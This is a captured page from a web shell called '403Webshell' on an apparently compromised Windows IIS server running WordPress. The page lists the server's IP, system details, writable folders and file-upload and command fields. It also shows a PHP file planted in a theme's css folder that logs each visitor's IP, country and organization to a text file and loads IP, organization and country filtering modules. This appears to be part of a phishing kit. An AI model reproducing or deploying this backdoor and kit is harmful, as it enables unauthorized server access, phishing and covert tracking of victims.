403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/KnowledgeBase/wp-content/themes/mrx/css/CH/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/KnowledgeBase/wp-content/themes/mrx/css/CH/index.php
<?php 
include "./Allinone/Get_IP.php";
include "./Mod_menu/Edit_All.php";

//===================================================================================
 $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://ip-info.ff.avast.com/v2/info?ip=" . $ip);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    $ipxa_data_in = curl_exec($ch);
    curl_close($ch);
    $ipxa_data = json_decode($ipxa_data_in,true);
    $country = $ipxa_data['countryName'];
    $organization = $ipxa_data['organization'];
	$file = fopen("IPS.txt","a");
fwrite($file,$country." | ".$ip." | ".$organization." | ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n");
//===================================================================================
include "./Allinone/IP_Range.php";
include "./Allinone/Organization.php";
include "./Allinone/Country.php";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit